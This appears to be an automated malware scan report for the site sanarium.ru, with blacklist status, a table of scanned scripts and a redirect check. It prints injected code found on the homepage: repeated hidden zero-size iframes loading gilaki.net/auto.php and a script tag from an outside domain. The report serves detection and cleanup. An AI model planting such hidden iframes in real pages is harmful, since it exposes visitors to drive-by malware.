Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=sanarium.ru
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://www.sanarium.ru/ | 200 OK Content-Length: 23108 Content-Type: text/html | malicious |
Page code contains blacklisted domain: gilaki.net ...[8085 bytes skipped]... pt'; ga.async = true; ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'http://www') + '.google-analytics.com/ga.js'; var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ga, s); })(); </script> <script language="JavaScript" src="http://sexfromindia.com/linkex/jquery-1.6.5.min.js" type="text/javascript"></script><iframe src="http://gilaki.net/auto.php" width="0" height="0" frameborder="0"></iframe> <iframe src="http://gilaki.net/auto.php" width="0" height="0" frameborder="0"></iframe> <iframe src="http://gilaki.net/auto.php" width="0" height="0" frameborder="0"></iframe> <iframe src="http://gilaki.net/auto.php" width="0" height="0" frameborder="0"></iframe> <iframe src="http://gilaki.net/auto.php" width="0" height="0" frameborder="0"></iframe> ...[18122 bytes skipped]... Malicious iFrame found. The same iFrame was found in 28 websites. size: 0x0 src: http://gilaki.net/auto.php This URL is marked by Google as suspicious <iframe src="http://gilaki.net/auto.php" width="0" height="0" frameborder="0"> | ||
http://www.sanarium.ru/media/system/js/caption.js | 200 OK Content-Length: 1963 Content-Type: application/x-javascript | clean |
http://www.sanarium.ru/plugins/content/phocagalleryslideshow.js | 200 OK Content-Length: 6582 Content-Type: application/x-javascript | clean |
http://www.sanarium.ru/plugins/system/jcemediabox/js/jcemediabox.js?version=112 | 200 OK Content-Length: 53121 Content-Type: application/x-javascript | clean |
http://ajax.googleapis.com/ajax/libs/jquery/1.6/jquery.min.js | 200 OK Content-Length: 91668 Content-Type: text/javascript | clean |
http://www.sanarium.ru/modules/mod_fpss/includes/js/jquery.fpss.js | 200 OK Content-Length: 4899 Content-Type: application/x-javascript | clean |
http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js | 200 OK Content-Length: 72174 Content-Type: text/javascript | clean |
http://www.sanarium.ru/templates/sanarium_9/scripts/jquery.mousewheel.js | 200 OK Content-Length: 2412 Content-Type: application/x-javascript | clean |
http://www.sanarium.ru/templates/sanarium_9/scripts/jScrollPane.js | 200 OK Content-Length: 22692 Content-Type: application/x-javascript | clean |
http://sexfromindia.com/linkex/jquery-1.6.5.min.js | 500 Can't connect to sexfromindia.com:80 (Bad hostname) Content-Length: 164 Content-Type: text/plain | clean |
http://sexfromindia.com/test404page.js | 500 Can't connect to sexfromindia.com:80 (Bad hostname) Content-Length: 164 Content-Type: text/plain | clean |
http://www.sanarium.ru//mc.yandex.ru/metrika/watch.js/ | 500 timeout Content-Length: 30 Content-Type: text/plain | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: sanarium.ru
Result:
GET / HTTP/1.1
Host: sanarium.ru
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: sanarium.ru
Referer: http://www.google.com/search?q=sanarium.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: sanarium.ru
Referer: http://www.google.com/search?q=sanarium.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.